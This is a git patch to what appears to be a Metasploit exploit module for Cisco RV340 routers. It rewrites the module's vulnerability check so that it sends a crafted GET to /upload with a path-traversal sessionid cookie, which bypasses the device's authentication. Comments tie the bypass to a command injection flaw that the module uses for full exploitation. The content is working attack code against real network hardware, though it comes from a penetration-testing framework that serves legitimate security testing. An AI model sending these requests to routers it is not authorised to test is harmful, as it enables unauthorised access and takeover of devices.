From 79b1801a4f5300328867589f84a4fd577b4ef4a6 Mon Sep 17 00:00:00 2001
From: Stephen Wildow <stephen.wildow@neterum.com>
Date: Sat, 11 Feb 2023 17:43:33 -0500
Subject: [PATCH] Rewrote check method to only abuse authentication bypass. 
 Added additional status checks.

---
 .../exploits/linux/http/cisco_rv340_lan.rb    | 40 +++++++++++++------
 1 file changed, 27 insertions(+), 13 deletions(-)

diff --git a/modules/exploits/linux/http/cisco_rv340_lan.rb b/modules/exploits/linux/http/cisco_rv340_lan.rb
index 42ee5aae75..9336dde7a8 100644
--- a/modules/exploits/linux/http/cisco_rv340_lan.rb
+++ b/modules/exploits/linux/http/cisco_rv340_lan.rb
@@ -88,22 +88,35 @@ class MetasploitModule < Msf::Exploit::Remote
     )
   end
 
+  # sessionid utilized later needs to be set to length
+  # of 16 or exploit will fail.  Tested with lengths
+  # 14-17
+  def generate_session_id
+    return Rex::Text.rand_text_alphanumeric(16)
+  end
+
   def check
-    # Ripped from jbaines-r7 cisco_rv_series_authbypass_and_rce
-    # Test to see if router is responding and possibly vulnerable
-    res = send_exploit('id')
+    res = send_request_cgi({
+      'method' => 'GET',
+      'uri' => '/upload',
+      'headers' => {
+        'Cookie' => 'sessionid =../../www/index.html; sessionid=' + generate_session_id
+      }
+    }, 10)
 
-    return CheckCode::Unknown("Didn't receive a response from the target.") if res.nil?
-
-    # Versions 1.0.03.26 and above will respond with 403 Forbidden during exploitation
-    return CheckCode::Safe('The target responded with 403 Forbidden and is not vulnerable.') if res.code == 403
-
-    # Vulnerable versions will respond with 301 Moved Permanently in body of response
-    if res.body.include?('<head><title>301 Moved Permanently</title></head>')
-      return CheckCode::Appears('The device responded to exploitation with a 200 OK.')
+    # A proper "upload" will trigger file creation.  So created above is an incorrect "upload" call to avoid file
+    # creation. The router return a status code 405 Not Allowed if authentication has been bypassed by above request.
+    # The firmware containing this authentication bypass also contains the command injection vulnerability that will be
+    # abused during actual exploitation. Non-vulnerable firmware versions will respond with 403 Forbidden.
+    if res.nil?
+      return CheckCode::Unknown('The device did not respond to request packet.')
+    elsif !res.nil? && res.code == 405
+      return CheckCode::Appears('The device is vulnerable to authentication bypass. Likely also vulnerable to command injection.')
+    elsif res.code == 403
+      return CheckCode::Safe('The device is not vulnerable to exploitation.')
+    else # Catch-all
+      return CheckCode::Unknown('The target responded in such a way that exploitation in unknown and unlikely.')
     end
-
-    CheckCode::Safe('The target did not respond with an expected payload.')
   end
 
   def execute_command(cmd, _opts = {})
@@ -116,6 +129,7 @@ class MetasploitModule < Msf::Exploit::Remote
     end
 
     if target['Type'] == :linux_dropper
+      fail_with(Failure::Unreachable, 'The target did not respond') unless res
       fail_with(Failure::UnexpectedReply, 'The target did not respond with a 200 OK') unless res&.code == 200
       begin
         body_json = res.get_json_document